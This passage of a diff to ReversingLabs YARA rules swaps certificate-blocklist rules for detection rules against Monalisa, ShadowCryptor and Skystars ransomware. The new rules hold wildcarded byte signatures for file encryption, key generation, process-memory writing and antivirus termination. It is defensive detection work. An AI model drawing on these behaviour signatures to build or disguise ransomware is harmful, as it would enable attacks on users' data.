+            E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 C0 48 69 F0 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? FF
+            D0 49 89 F0 BA ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 48 89 85 ?? ?? ?? ??
+            48 83 BD ?? ?? ?? ?? ?? 75 ?? 8B 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? BB ?? ?? ?? ??
+            E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 4C 8B 8D ?? ??
+            ?? ?? 4C 8D 85 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 48 89 4C 24
+        }
+		$kill_file_processes_p2 = {
+            89 C1 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 8B 85 ?? ?? ?? ??
+            85 C0 75 ?? 48 8B 05 ?? ?? ?? ?? FF D0 48 8B 95 ?? ?? ?? ?? 49 89 D0 BA ?? ?? ?? ??
+            48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 8B 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? BB ?? ??
+            ?? ?? E9 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? FF D0 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0
+            89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 48
+            98 48 69 D0 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 01 D0 8B 00 39 85 ?? ?? ?? ?? 75 ??
+            48 8B 05 ?? ?? ?? ?? FF D0 48 8B 95 ?? ?? ?? ?? 49 89 D0 BA ?? ?? ?? ?? 48 89 C1 48
+            8B 05 ?? ?? ?? ?? FF D0 8B 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? BB ?? ?? ?? ?? E9 ??
+            ?? ?? ?? 8B 85 ?? ?? ?? ?? 48 98 48 69 D0 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 01 D0
+            8B 00 41 89 C0 BA ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? FF D0 48 89 85 ??
+            ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 48 8D 55 ?? 48 8B 85 ?? ?? ?? ??
+            41 B8 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C1 48 8B 05 ??
+            ?? ?? ?? FF D0 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 48
+            8D 55 ?? 48 8D 45 ?? 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1
+            E8 ?? ?? ?? ?? 48 8D 45 ?? 49 C7 C0 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ??
+            ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C0 ?? 48 63 C8 48 8D 45 ?? 48 8D 55
+            ?? 49 C7 C1 ?? ?? ?? ?? 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? 48 8D 55 ?? 48 8D 85 ?? ??
+            ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Open Source Developer, Muhammad Lee" and pe.signatures [ i ] . serial == "04:42:2f:12:03:7b:c2:03:25:21:db:b6:ae:02:ea:0e" and 1404172799 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( $check_processes ) and ( all of ( $kill_file_processes_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_65Eae6C98111Dc40Bf4F962Bf27227F2 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Monalisa : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing GovRAT malware."
+		description = "Yara rule that detects Monalisa ransomware."
 		author = "ReversingLabs"
-		id = "34275efd-b941-56f5-8e1b-30a43f1936e2"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "34addb63-2426-59a2-b79b-052a9161d361"
+		date = "2022-05-13"
+		modified = "2022-05-13"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1526-L1542"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Monalisa.yara#L1-L83"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "20c0f4e9783586e68ff363fe6a72398f6ea27aef5d25f98872d1203ce1a0c9bd"
+		logic_hash = "0bcb79dff111ec05ac93bbe9a777546bd6234dc60d9f6982c03cd0bc3b26b038"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Monalisa"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? 53 56 A1 ?? ?? ?? ?? 33
+            C5 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B 75 ?? 83 EC ?? C7 45 ?? ?? ?? ?? ?? 8B CC 89 65
+            ?? 8D 45 ?? B3 ?? 51 50 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC 89 65 ?? 33 C0 6A
+            ?? 68 ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 66 89 01 E8 ?? ?? ?? ??
+            83 EC ?? C6 45 ?? ?? 8D 45 ?? 8B CC 50 E8 ?? ?? ?? ?? 8A D3 88 5D ?? 8B CE E8 ?? ??
+            ?? ?? 8B 55 ?? 83 C4 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ??
+            ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ??
+            83 C4 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? E8 ??
+            ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5E 5B 8B E5 5D C3
+        }
+		$write_proc_mem = {
+            8D 45 ?? 50 FF 76 ?? 8B 46 ?? 03 C7 50 8B 06 03 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ??
+            85 C0 0F 84 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 3E 0F B7 41 ?? 48 3B D8 75 ?? 8B 51 ??
+            EB ?? 8B 4D ?? 8B 35 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 56 ?? 8B 4E ?? 2B D7 8B C1 25 ??
+            ?? ?? ?? 3D ?? ?? ?? ?? 75 ?? B8 ?? ?? ?? ?? EB ?? 8B C1 25 ?? ?? ?? ?? 3D ?? ?? ??
+            ?? 75 ?? B8 ?? ?? ?? ?? EB ?? 8B C1 25 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 ?? B8 ?? ?? ??
+            ?? EB ?? 8B C1 25 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 ?? B8 ?? ?? ?? ?? EB ?? F7 C1 ?? ??
+            ?? ?? 74 ?? B8 ?? ?? ?? ?? EB ?? F7 C1 ?? ?? ?? ?? 74 ?? B8 ?? ?? ?? ?? EB ?? 85 C9
+            B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 0F 48 C1 8D 4D ?? 51 50 8B 45 ?? 52 03 C7 50 FF 75 ??
+            FF 15
+        }
+		$encrypt_files = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ?? 33 C5 50
+            8D 45 ?? 64 A3 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? B8 ?? ?? ?? ?? 2B C1 83 F8 ?? 0F 82 ??
+            ?? ?? ?? 83 3D ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 51 0F 43 05 ?? ?? ?? ?? 50 6A ?? 68 ??
+            ?? ?? ?? 51 FF 75 ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? C7 45 ?? ?? ??
+            ?? ?? E8 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 33 C9 C7 05 ?? ?? ?? ?? ?? ?? ??
+            ?? 0F 10 00 0F 11 05 ?? ?? ?? ?? F3 0F 7E 40 ?? 66 0F D6 05 ?? ?? ?? ?? C7 40 ?? ??
+            ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 66 89 08 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ??
+            ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77
+            ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 64
+            89 0D ?? ?? ?? ?? 59 8B E5 5D C3
+        }
+		$generate_key = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89
+            45 ?? 56 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 8B 75 ??
+            8B 0C 88 A1 ?? ?? ?? ?? 3B 81 ?? ?? ?? ?? 7F ?? 56 FF 75 ?? FF 35 ?? ?? ?? ?? FF 15
+            ?? ?? ?? ?? 85 C0 74 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5E 8B 4D ?? 33 CD E8 ?? ??
+            ?? ?? 8B E5 5D C2 ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 3D ?? ?? ?? ?? ??
+            75 ?? B9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 68 ?? ?? ?? ??
+            8D 4D ?? E8 ?? ?? ?? ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 8D 45 ?? 50 E8
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Open Source Developer, BHARATH KUCHANGI" and pe.signatures [ i ] . serial == "65:ea:e6:c9:81:11:dc:40:bf:4f:96:2b:f2:72:27:f2" and 1404172799 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $write_proc_mem ) and ( $generate_key ) and ( $encrypt_files )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_12D5A4B29Fe6156D4195Fba55Ae0D9A9 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Shadowcryptor : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing GovRAT malware."
+		description = "Yara rule that detects ShadowCryptor ransomware."
 		author = "ReversingLabs"
-		id = "45c37c98-1006-51e4-8832-b8e5c9fba416"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "983e8927-4829-540f-9697-886226fd54ce"
+		date = "2021-02-11"
+		modified = "2021-02-11"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1544-L1560"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.ShadowCryptor.yara#L1-L89"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "860550745f6dbcd7dd0925d9b8f04e8e08e8b7c06343a4c070e131a815c42e12"
+		logic_hash = "875150db9fc36cd992988bba7d0c05487418b901980bf428ebd427c82fbcacd7"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "ShadowCryptor"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
+            33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? C7 45 ?? ??
+            ?? ?? ?? 8D 45 ?? 83 7D ?? ?? 0F 57 C0 66 0F 13 85 ?? ?? ?? ?? 0F 43 45 ?? 50 8D 85
+            ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ??
+            ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B
+            BD ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? EB ??
+            8D A4 24 ?? ?? ?? ?? 90 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D3 85 C0 0F 84 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D3 85 C0 0F 84 ?? ?? ?? ?? 33 C0 83 7D
+            ?? ?? 66 89 85 ?? ?? ?? ?? 8D 45 ?? 0F 43 45 ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ??
+            ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 85
+            ?? ?? ?? ?? 83 F8 ?? 74 ?? A8 ?? 74 ?? 50 8D 85 ?? ?? ?? ?? 50 51 8B 8D ?? ?? ?? ??
+            E8 ?? ?? ?? ?? EB ?? 51 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 51 8B 8D ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 83 C7 ?? 83 D6 ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ??
+            ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83
+            7D ?? ?? 72 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B D6 8B C7 8B 4D ?? 64 89 0D ?? ??
+            ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2
+        }
+		$encrypt_files = {
+            55 8B EC 83 E4 ?? 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ??
+            33 C4 89 44 24 ?? 53 56 57 A1 ?? ?? ?? ?? 33 C4 50 8D 44 24 ?? 64 A3 ?? ?? ?? ?? 8B
+            F1 8D 46 ?? 50 8D 4E ?? E8 ?? ?? ?? ?? 33 C0 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ??
+            ?? ?? ?? 66 89 44 24 ?? 89 44 24 ?? 39 46 ?? 0F 84 ?? ?? ?? ?? 8D A4 24 ?? ?? ?? ??
+            80 7E ?? ?? 0F 85 ?? ?? ?? ?? 51 8D 44 24 ?? 50 8D 44 24 ?? 50 8D 4E ?? E8 ?? ?? ??
+            ?? 8B C8 E8 ?? ?? ?? ?? 8B D0 8B 02 85 C0 74 ?? 8B 00 8B 48 ?? 8B 40 ?? 49 23 4A ??
+            8B 04 88 8D 4C 24 ?? 3B C8 74 ?? 6A ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B 46 ?? 8B 4E ?? 48
+            03 C8 8B 46 ?? 48 23 C8 8B 46 ?? 8B 3C 88 83 7F ?? ?? 72 ?? FF 37 E8 ?? ?? ?? ?? 83
+            C4 ?? 33 C0 C7 47 ?? ?? ?? ?? ?? C7 47 ?? ?? ?? ?? ?? 66 89 07 FF 4E ?? 75 ?? 89 46
+            ?? 83 EC ?? 8B CC 6A ?? 89 41 ?? 33 C0 C7 41 ?? ?? ?? ?? ?? 50 66 89 01 8D 44 24 ??
+            50 E8 ?? ?? ?? ?? 51 8B CE E8 ?? ?? ?? ?? 8B C8 0B CA 74 ?? 01 46 ?? 11 56 ?? 83 7C
+            24 ?? ?? 8D 54 24 ?? 0F 43 54 24 ?? 83 EC ?? 8B FC 33 C0 C7 47 ?? ?? ?? ?? ?? C7 47
+            ?? ?? ?? ?? ?? 66 89 07 66 39 02 74 ?? 8B C2 8D 48 ?? 89 4C 24 ?? 66 8B 08 83 C0 ??
+            66 85 C9 75 ?? 2B 44 24 ?? D1 F8 50 52 8B CF E8 ?? ?? ?? ?? 8B 4E ?? 83 79 ?? ?? 8D
+            41 ?? 72 ?? 8B 00 8B 91 ?? ?? ?? ?? 81 C1 ?? ?? ?? ?? 83 79 ?? ?? 72 ?? 8B 09 50 E8
+            ?? ?? ?? ?? 83 C4 ?? 83 7E ?? ?? 0F 85 ?? ?? ?? ?? 83 7C 24 ?? ?? 72 ?? FF 74 24 ??
+            E8 ?? ?? ?? ?? 83 C4 ?? 8B 4C 24 ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4C 24 ?? 33
+            CC E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$terminate_antivirus_processes_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
+            33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B D9 C7 85 ?? ?? ?? ?? ?? ??
+            ?? ?? 33 C0 C7 43 ?? ?? ?? ?? ?? C7 43 ?? ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 66 89 03 89
+            45 ?? 50 6A ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85
+        }
+		$terminate_antivirus_processes_p2 = {
+            8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D 49 ?? 33 F6 8B BC B5 ?? ?? ??
+            ?? 8D 85 ?? ?? ?? ?? 57 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 39 43 ?? 74 ?? 6A ?? 68 ??
+            ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 66 83 3F ?? 75 ?? 33 C0 EB ?? 8B C7 8D 50 ?? 8D 49 ??
+            66 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C2 D1 F8 50 57 8B CB E8 ?? ?? ?? ?? 46 83 FE ??
+            72 ?? 8B B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 56 FF
+            15 ?? ?? ?? ?? 8B C3 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ??
+            ?? ?? ?? 8B E5 5D C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Open Source Developer, Marc Chapon" and pe.signatures [ i ] . serial == "12:d5:a4:b2:9f:e6:15:6d:41:95:fb:a5:5a:e0:d9:a9" and 1404172799 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $terminate_antivirus_processes_p* ) ) and ( $find_files ) and ( $encrypt_files )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_0087D60D1E2B9374Eb7A735Dce4Bbdae56 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Skystars : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing GovRAT malware."
+		description = "Yara rule that detects Skystars ransomware."
 		author = "ReversingLabs"
-		id = "8759a40a-648e-548e-a519-bedc812aefe4"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "9dc19bda-c5bd-58fb-8c4f-a7d8a6fbbce9"
+		date = "2020-11-20"
+		modified = "2020-11-20"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1562-L1580"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Skystars.yara#L1-L97"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "d6e0d22e926a237f1cc6b71c6f8ce01e497723032c9efba1e6af7327a786b608"
+		logic_hash = "352d22183b0974908ce684725fe85b4714ac5959c3bddf093b54383195881a5a"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Skystars"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AMO-K Limited Liability Company" and ( pe.signatures [ i ] . serial == "00:87:d6:0d:1e:2b:93:74:eb:7a:73:5d:ce:4b:bd:ae:56" or pe.signatures [ i ] . serial == "87:d6:0d:1e:2b:93:74:eb:7a:73:5d:ce:4b:bd:ae:56" ) and 1404172799 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_0860C8A7Ed18C3F030A32722Fd2B220C : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "335a1cd3-520a-5f0f-abda-6ec8a122de4b"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1582-L1598"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "3c777fb157a6669bfdf3143e77f69265e09458a2b42b75b72680eb043da71e85"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$search_files_p1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ??
+            8B 5D ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8D 85 ?? ?? ?? ?? 50
+            6A ?? 6A ?? FF 75 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 5D ?? 85 DB
+            74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ??
+            83 C4 ?? 58 89 45 ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? B8 ??
+            ?? ?? ?? EB ?? B8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8B 5D
+            ?? FF 33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8D 45 ?? 50 E8 ?? ?? ?? ??
+            8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A
+            ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 45 ?? 50 8B 5D ?? 85 DB 74 ??
+            53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 5D ?? FF 33
+        }
+		$search_files_p2 = {
+            B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 68 ?? ??
+            ?? ?? FF 75 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 5D ?? 85 DB 74 ??
+            53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4
+            ?? 58 89 45 ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? B8 ?? ?? ??
+            ?? EB ?? B8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8B 5D ?? FF
+            33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B 5D
+            ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 68 ?? ?? ?? ??
+            6A ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 45 ?? 50 8B 5D ?? 85 DB 74
+            ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? E9 ?? ?? ?? ?? FF 75 ?? B8 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 83 C4 ?? 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B E5 5D C2
+        }
+		$encrypt_files = {
+            55 8B EC 81 EC ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B 5D ?? 8B 03
+            85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
+            89 45 ?? 8B 45 ?? 50 8B 5D ?? 85 DB 74 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 58 89 45 ?? 68
+            ?? ?? ?? ?? 6A ?? 8B 5D ?? 8B 03 85 C0 75 ?? B8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? BB ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? FF 75 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 5D ?? FF
+            33 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ??
